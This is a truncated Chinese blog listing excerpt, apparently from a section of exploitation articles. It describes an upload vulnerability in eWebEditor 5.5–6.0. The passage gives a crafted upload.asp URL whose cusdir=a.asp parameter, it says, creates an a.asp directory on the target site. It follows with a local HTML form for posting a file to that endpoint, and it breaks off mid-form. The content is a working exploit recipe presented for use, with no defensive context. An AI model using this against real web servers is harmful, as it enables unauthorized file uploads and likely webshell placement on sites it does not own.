页面载入中,请稍后...

现在位置 >首页 > 所有关于利用的文章
ewebeditor 5.5 – 6.0 鸡肋的上传漏洞
http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 这样会在 网站目录下生产 a.asp这个文件、 然后再本地构造html  <form action=”http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp” method=post name=myform enctype=”multipart/form-data”> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form&...
阅读全文
不想听你唠叨×